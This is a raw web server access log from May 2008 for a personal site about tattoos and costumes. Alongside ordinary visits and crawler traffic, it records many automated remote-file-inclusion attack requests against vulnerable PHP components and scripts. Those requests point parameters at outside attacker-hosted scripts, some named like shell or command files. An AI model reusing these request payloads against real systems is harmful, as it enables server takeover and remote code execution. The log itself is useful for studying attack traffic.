24.227.163.90 - - [22/May/2008:22:41:18 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
217.67.26.84 - - [22/May/2008:22:44:05 -0500] "GET /logs//login.php?dir=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
217.67.26.84 - - [22/May/2008:22:44:05 -0500] "GET /logs//login.php?dir=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
217.67.26.84 - - [22/May/2008:22:44:05 -0500] "GET //login.php?dir=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
217.67.26.84 - - [22/May/2008:22:44:06 -0500] "GET //login.php?dir=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
74.6.76.45 - - [22/May/2008:22:44:41 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
208.116.44.60 - - [22/May/2008:22:45:01 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.ezforum.de/antares/id2.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.811"
208.116.44.60 - - [22/May/2008:22:45:01 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.ezforum.de/antares/id2.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.811"
64.13.248.31 - - [22/May/2008:22:45:07 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.ezforum.de/antares/id2.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
64.13.248.31 - - [22/May/2008:22:45:07 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.ezforum.de/antares/id2.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
212.108.197.58 - - [22/May/2008:22:45:40 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.ezforum.de/antares/arab.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
212.108.197.58 - - [22/May/2008:22:45:40 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.ezforum.de/antares/arab.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
70.85.192.194 - - [22/May/2008:22:46:09 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.ezforum.de/antares/id2.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.811"
70.85.192.194 - - [22/May/2008:22:46:09 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.ezforum.de/antares/id2.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.811"
70.85.192.194 - - [22/May/2008:22:46:15 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.ezforum.de/antares/id2.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.811"
70.85.192.194 - - [22/May/2008:22:46:15 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.ezforum.de/antares/id2.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.811"
213.218.137.79 - - [22/May/2008:22:48:18 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.ezforum.de/antares/arab.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
213.218.137.79 - - [22/May/2008:22:48:18 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.ezforum.de/antares/arab.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
217.67.26.84 - - [22/May/2008:22:54:27 -0500] "GET /logs//skin/zero_vote/error.php?dir=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
217.67.26.84 - - [22/May/2008:22:54:27 -0500] "GET //skin/zero_vote/error.php?dir=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
65.55.208.137 - - [22/May/2008:22:56:00 -0500] "GET /logs/access_log.1170115200 HTTP/1.1" 200 175297 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
67.205.74.75 - - [22/May/2008:22:58:10 -0500] "GET /logs/db.php?path_local=http://www.alazharacademy.ca//baram.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
67.205.74.75 - - [22/May/2008:22:58:10 -0500] "GET /db.php?path_local=http://www.alazharacademy.ca//baram.txt?? HTTP/1.1" 404 290 "-""libwww-perl/5.805"
89.108.64.164 - - [22/May/2008:22:58:36 -0500] "GET /logs/send_reminders.php?includedir=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
89.108.64.164 - - [22/May/2008:22:58:36 -0500] "GET /send_reminders.php?includedir=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
189.22.150.131 - - [22/May/2008:23:02:46 -0500] "GET /logs/main.php5?page=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
189.22.150.131 - - [22/May/2008:23:02:48 -0500] "GET /main.php5?page=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
202.131.92.138 - - [22/May/2008:23:03:13 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.ezforum.de/antares/arab.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
202.131.92.138 - - [22/May/2008:23:03:13 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.ezforum.de/antares/arab.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
218.38.34.229 - - [22/May/2008:23:05:34 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.chinaadopttalk.com/forum/avatars/data.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
218.38.34.229 - - [22/May/2008:23:05:34 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.chinaadopttalk.com/forum/avatars/data.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
212.145.146.10 - - [22/May/2008:23:10:02 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://agonyandivy.com/images/.jpg?? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
212.145.146.10 - - [22/May/2008:23:10:02 -0500] "GET //Neos_Chronos/header.php?base_folder=http://agonyandivy.com/images/.jpg?? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
58.26.137.64 - - [22/May/2008:23:13:07 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://83.222.131.90/~legitimi/mybase/safe.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.69"
58.26.137.64 - - [22/May/2008:23:13:08 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://83.222.131.90/~legitimi/mybase/safe.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.69"
202.131.92.138 - - [22/May/2008:23:17:00 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://agonyandivy.com/images/.jpg?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
202.131.92.138 - - [22/May/2008:23:17:01 -0500] "GET //Neos_Chronos/header.php?base_folder=http://agonyandivy.com/images/.jpg?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
202.131.92.138 - - [22/May/2008:23:18:41 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
202.131.92.138 - - [22/May/2008:23:18:41 -0500] "GET //Neos_Chronos/header.php?base_folder=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
82.146.59.231 - - [22/May/2008:23:19:04 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
82.146.59.231 - - [22/May/2008:23:19:04 -0500] "GET //Neos_Chronos/header.php?base_folder=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
209.163.169.99 - - [22/May/2008:23:19:22 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
209.163.169.99 - - [22/May/2008:23:19:22 -0500] "GET //Neos_Chronos/header.php?base_folder=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.810"
58.26.137.64 - - [22/May/2008:23:23:16 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.69"
58.26.137.64 - - [22/May/2008:23:23:17 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.69"
193.6.50.161 - - [22/May/2008:23:25:33 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.805"
193.6.50.161 - - [22/May/2008:23:25:34 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.805"
89.218.85.18 - - [22/May/2008:23:25:36 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://ucil.11omb.com/img.jpg? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
89.218.85.18 - - [22/May/2008:23:25:37 -0500] "GET //Neos_Chronos/header.php?base_folder=http://ucil.11omb.com/img.jpg? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
89.218.85.18 - - [22/May/2008:23:25:38 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://ucil.11omb.com/img.jpg? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
89.218.85.18 - - [22/May/2008:23:25:39 -0500] "GET //Neos_Chronos/header.php?base_folder=http://ucil.11omb.com/img.jpg? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
205.178.145.65 - - [22/May/2008:23:27:57 -0500] "GET //Neos_Chronos/header.php?base_folder=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
74.6.76.46 - - [22/May/2008:23:30:45 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
189.22.150.131 - - [22/May/2008:23:31:42 -0500] "GET /logs//login.php?dir=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
189.22.150.131 - - [22/May/2008:23:31:45 -0500] "GET //login.php?dir=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
80.237.209.104 - - [22/May/2008:23:35:16 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://arai.web.id/jek/bot/dodol.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
80.237.209.104 - - [22/May/2008:23:35:17 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://arai.web.id/jek/bot/dodol.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
212.108.197.58 - - [22/May/2008:23:38:06 -0500] "GET //Neos_Chronos/header.php?base_folder=http://1nb0x.iespana.es/vai.txt?? HTTP/1.1" 404 308 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
212.108.197.58 - - [22/May/2008:23:38:06 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://1nb0x.iespana.es/vai.txt?? HTTP/1.1" 404 313 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
189.22.150.131 - - [22/May/2008:23:40:30 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
189.22.150.131 - - [22/May/2008:23:40:32 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
212.145.146.10 - - [22/May/2008:23:42:26 -0500] "GET /logs/access_log.1204761600//Neos_Chronos/header.php?base_folder=http://agonyandivy.com/images/.jpg?? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
212.145.146.10 - - [22/May/2008:23:42:27 -0500] "GET //Neos_Chronos/header.php?base_folder=http://agonyandivy.com/images/.jpg?? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
212.145.146.10 - - [22/May/2008:23:42:27 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://agonyandivy.com/images/.jpg?? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
212.145.146.10 - - [22/May/2008:23:42:27 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://agonyandivy.com/images/.jpg?? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
65.55.208.120 - - [22/May/2008:23:44:48 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.120 - - [22/May/2008:23:44:48 -0500] "GET /logs/access_log.1168128000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
67.195.37.158 - - [22/May/2008:23:45:30 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.158 - - [22/May/2008:23:45:30 -0500] "GET /costume/costume2.htm HTTP/1.0" 200 1810 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
217.67.26.84 - - [23/May/2008:00:03:14 -0500] "GET /logs//skin/zero_vote/error.php?dir=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
217.67.26.84 - - [23/May/2008:00:03:14 -0500] "GET /logs//skin/zero_vote/error.php?dir=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
217.67.26.84 - - [23/May/2008:00:03:14 -0500] "GET //skin/zero_vote/error.php?dir=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
217.67.26.84 - - [23/May/2008:00:03:15 -0500] "GET //skin/zero_vote/error.php?dir=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
200.249.155.6 - - [23/May/2008:00:09:21 -0500] "GET /logs/main.php5?page=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
200.249.155.6 - - [23/May/2008:00:09:24 -0500] "GET /main.php5?page=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
61.247.222.53 - - [23/May/2008:00:12:31 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Yeti/1.0 (+http://help.naver.com/robots/)"
61.247.222.53 - - [23/May/2008:00:12:31 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "-""Yeti/1.0 (+http://help.naver.com/robots/)"
202.46.80.62 - - [23/May/2008:00:14:35 -0500] "GET /costume/ HTTP/1.0" 200 640 "http://id.wikipedia.org/wiki/Kostum""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
202.46.80.62 - - [23/May/2008:00:14:45 -0500] "GET /costume/costume1.htm HTTP/1.0" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
202.46.80.62 - - [23/May/2008:00:14:46 -0500] "GET /costume/enter1.gif HTTP/1.0" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
202.46.80.62 - - [23/May/2008:00:14:47 -0500] "GET /costume/history5.gif HTTP/1.0" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
202.46.80.62 - - [23/May/2008:00:14:49 -0500] "GET /costume/costm_a.JPG HTTP/1.0" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
202.46.80.62 - - [23/May/2008:00:14:54 -0500] "GET /costume/costume2.htm HTTP/1.0" 200 1810 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
202.46.80.62 - - [23/May/2008:00:15:00 -0500] "GET /costume/thmb1.htm HTTP/1.0" 200 3799 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
202.46.80.62 - - [23/May/2008:00:15:02 -0500] "GET /costume/costm2.jpg HTTP/1.0" 200 36199 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
202.46.80.62 - - [23/May/2008:00:15:02 -0500] "GET /costume/costm3.jpg HTTP/1.0" 200 39529 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
202.46.80.62 - - [23/May/2008:00:15:02 -0500] "GET /costume/costm4.jpg HTTP/1.0" 200 36814 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
202.46.80.62 - - [23/May/2008:00:15:05 -0500] "GET /costume/costm1.jpg HTTP/1.0" 200 59753 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
202.46.80.62 - - [23/May/2008:00:15:17 -0500] "GET /costume/costm5.jpg HTTP/1.0" 200 36546 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
202.46.80.62 - - [23/May/2008:00:15:25 -0500] "GET /costume/costm6.jpg HTTP/1.0" 200 39194 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
202.46.80.62 - - [23/May/2008:00:15:28 -0500] "GET /costume/costm7.jpg HTTP/1.0" 200 35141 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
202.46.80.62 - - [23/May/2008:00:15:36 -0500] "GET /costume/costm8.jpg HTTP/1.0" 200 35448 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
202.46.80.62 - - [23/May/2008:00:15:41 -0500] "GET /costume/costm9.jpg HTTP/1.0" 200 38021 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
202.46.80.62 - - [23/May/2008:00:15:45 -0500] "GET /costume/costm10.jpg HTTP/1.0" 200 60187 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
202.46.80.62 - - [23/May/2008:00:15:48 -0500] "GET /costume/costm11.jpg HTTP/1.0" 200 37363 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
202.46.80.62 - - [23/May/2008:00:15:56 -0500] "GET /costume/costm12.jpg HTTP/1.0" 200 35291 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
202.46.80.62 - - [23/May/2008:00:16:07 -0500] "GET /costume/links.htm HTTP/1.0" 200 1029 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
82.146.59.231 - - [23/May/2008:00:19:06 -0500] "GET /logs/access_log.1204761600//Neos_Chronos/header.php?base_folder=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
82.146.59.231 - - [23/May/2008:00:19:29 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
69.16.242.144 - - [23/May/2008:00:19:42 -0500] "GET /logs/access_log.1207785600///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 374 "-""libwww-perl/5.811"
69.16.242.144 - - [23/May/2008:00:19:43 -0500] "GET ///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 347 "-""libwww-perl/5.811"
69.16.242.144 - - [23/May/2008:00:19:43 -0500] "GET /logs///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 352 "-""libwww-perl/5.811"
69.16.242.144 - - [23/May/2008:00:19:49 -0500] "GET /logs/access_log.1207180800///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 374 "-""libwww-perl/5.811"
211.20.85.150 - - [23/May/2008:00:23:15 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; MSIECrawler)"
68.107.125.47 - - [23/May/2008:00:24:42 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21563 "http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=RNWE,RNWE:2005-52,RNWE:en&q=1500%27s+spanish+soldier+costume""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.107.125.47 - - [23/May/2008:00:24:43 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.107.125.47 - - [23/May/2008:00:24:44 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (compatible; Google Desktop)"
200.250.121.2 - - [23/May/2008:00:24:48 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://edan.fileave.com/cmd.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
200.250.121.2 - - [23/May/2008:00:24:49 -0500] "GET //Neos_Chronos/header.php?base_folder=http://edan.fileave.com/cmd.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
85.227.145.193 - - [23/May/2008:00:25:22 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.76"
85.227.145.193 - - [23/May/2008:00:25:23 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.76"
207.61.144.44 - - [23/May/2008:00:25:32 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.76"
207.61.144.44 - - [23/May/2008:00:25:32 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.76"
24.93.105.27 - - [23/May/2008:00:30:21 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
24.93.105.27 - - [23/May/2008:00:30:21 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
216.32.89.242 - - [23/May/2008:00:31:35 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/ask_password.php?dir=http://agonyandivy.com/images/.jpg?? HTTP/1.1" 404 343 "-""libwww-perl/5.811"
216.32.89.242 - - [23/May/2008:00:31:35 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://agonyandivy.com/images/.jpg?? HTTP/1.1" 404 316 "-""libwww-perl/5.811"
216.32.89.242 - - [23/May/2008:00:31:35 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://agonyandivy.com/images/.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
216.32.89.242 - - [23/May/2008:00:31:38 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/ask_password.php?dir=http://agonyandivy.com/images/.jpg?? HTTP/1.1" 404 343 "-""libwww-perl/5.811"
216.32.89.242 - - [23/May/2008:00:31:38 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://agonyandivy.com/images/.jpg?? HTTP/1.1" 404 316 "-""libwww-perl/5.811"
216.32.89.242 - - [23/May/2008:00:31:38 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://agonyandivy.com/images/.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
189.22.150.131 - - [23/May/2008:00:32:23 -0500] "GET /logs//skin/zero_vote/error.php?dir=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
189.22.150.131 - - [23/May/2008:00:32:27 -0500] "GET //skin/zero_vote/error.php?dir=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
85.21.96.188 - - [23/May/2008:00:34:27 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://pacrimcreations.com/id.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.812"
85.21.96.188 - - [23/May/2008:00:34:27 -0500] "GET //Neos_Chronos/header.php?base_folder=http://pacrimcreations.com/id.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.812"
85.227.145.193 - - [23/May/2008:00:37:12 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.76"
85.227.145.193 - - [23/May/2008:00:37:12 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.76"
200.250.121.2 - - [23/May/2008:00:39:15 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://edan.fileave.com/cmd.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
200.250.121.2 - - [23/May/2008:00:39:15 -0500] "GET //Neos_Chronos/header.php?base_folder=http://edan.fileave.com/cmd.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
82.194.70.137 - - [23/May/2008:00:46:04 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/ask_password.php?dir=http://agonyandivy.com/images/.jpg?? HTTP/1.1" 404 343 "-""libwww-perl/5.811"
82.194.70.137 - - [23/May/2008:00:46:05 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://agonyandivy.com/images/.jpg?? HTTP/1.1" 404 316 "-""libwww-perl/5.811"
82.194.70.137 - - [23/May/2008:00:46:05 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://agonyandivy.com/images/.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
